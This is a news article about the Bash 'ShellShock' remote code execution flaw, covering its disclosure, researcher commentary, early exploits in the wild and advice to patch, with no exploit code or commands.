Security Advisor

Millions of Systems and Devices Vulnerable to Bash 'ShellShock' Flaw

The 25-year-old flaw, which was just discovered on Wednesday, leaves systems running Linux and Mac OS X open to remote code execution attacks.

Security experts have discovered in the Bourne Again Shell (Bash), used in the Unix-based open source platform that could leave Linux and OS X system and connected devices like routers and webcams vulnerable to attack. Also, the flaw leaves a huge hole in an estimated half of all Web sites running on affected servers.

Discovered and disclosed by security researcher Stephane Chazelas late Wednesday night, the Bash shell vulnerability, called "ShellShock," could potentially affect more systems than April's Heartbleed flaw disclosure. While Heartbleed could allow attackers to extract information from targeted systems, ShellShock could lead to systems being completely taken over.

"Basically this vulnerability allows an attacker to perform remote code execution attacks on any server using the Bash shell," commented David Jacoby, Senior Security Researcher at Kaspersky Lab. "Unfortunately use of this shell is widespread -- it is used in many server products, including those powering Web sites."

Shortly after the flaw was discovered, GNU released a patch for its OS. However, according to Red Hat, the fix did not fully take care of the issue and the firm expects GNU to release a more effective patch sometime today.

And there's worse news: less than 24 hours since the ShellShock disclosure, researchers are already seeing exploits in the wild. Security researcher "Yinette" reported the first known exploit of the bug late last night, which includes functionality for denial of service (DDoS) attacks and automated brute force password hacks.

While there are no words on when a permanent fix for Linux and Apple users are coming, it is recommended that IT keep an eye out for when they are released and patch immediately. In the meantime it's recommended IT keep an eye out for possible network attacks that may attempt to breach firewall defenses.

Due to Windows OS and Windows Servers not using the Bash shell, ShellShock is not a direct threat to Microsoft hardware and software. But that doesn't mean Windows Shops are in the clear. Microsoft MVP Troy Hunt discussed in a blog concerning ShellShock that Windows shops are rarely ever 100 percent windows.

"There are non-Microsoft components sitting in front of their Microsoft application stack, components that the traffic needs to pass through before it hits the web servers," wrote Hunt. "These are also components that may have elevated privileges behind the firewall -- what's the impact if Shellshock is exploited on those? It could be significant and that's the point I'm making here; Shellshock has the potential to impact assets beyond just at-risk Bash implementations when it exists in a broader ecosystem of other machines."

Just like Heartbleed, the ShellShock flaw going unnoticed for decades has allowed it to lay dormant in numerous connected devices. Robert Graham, security expert for Errata Security, commented on when flaws like these are discovered, it's embarrassing for IT members who have worked in close proximity of the code for years.

"So we've known for 20 years that this is a problem, so why does it even happen? I think the problem is that most people don't know how things work," wrote Graham. "Like the IT guy 20 years ago, they can't look at it and immediately understand the implications and see what's wrong. So, they keep using it. This perpetuates itself into legacy code that we can never get rid of. It's mainframes, 20 years out of date and still a 50-billion dollar a year business for IBM."

About the Author

Chris Paoli is the site producer for and


  • Microsoft Warns IT Pros on Windows Netlogon Fix Coming Next Month

    Microsoft on Thursday issued a reminder to organizations to ensure that their systems are properly patched for a "Critical"-rated Windows Netlogon vulnerability before next month's "update Tuesday" patch distribution arrives.

  • Microsoft Nudging Skype for Business Users to Teams

    Microsoft on Thursday announced some perks and prods for Skype for Business unified communications users, with the aim of moving them to the Microsoft Teams collaboration service instead.

  • How To Improve Windows 10's Sound and Video Quality

    Windows 10 comes with built-in tools that can help users get the most out of their sound and video hardware.

  • Microsoft Offers More 'Solorigate' Advice Using Microsoft 365 Defender Tools

    Microsoft issued yet another article with advice on how to use its Microsoft 365 Defender suite of tools to protect against "Solorigate" advanced persistent threat types of attacks in a Thursday announcement.

comments powered by Disqus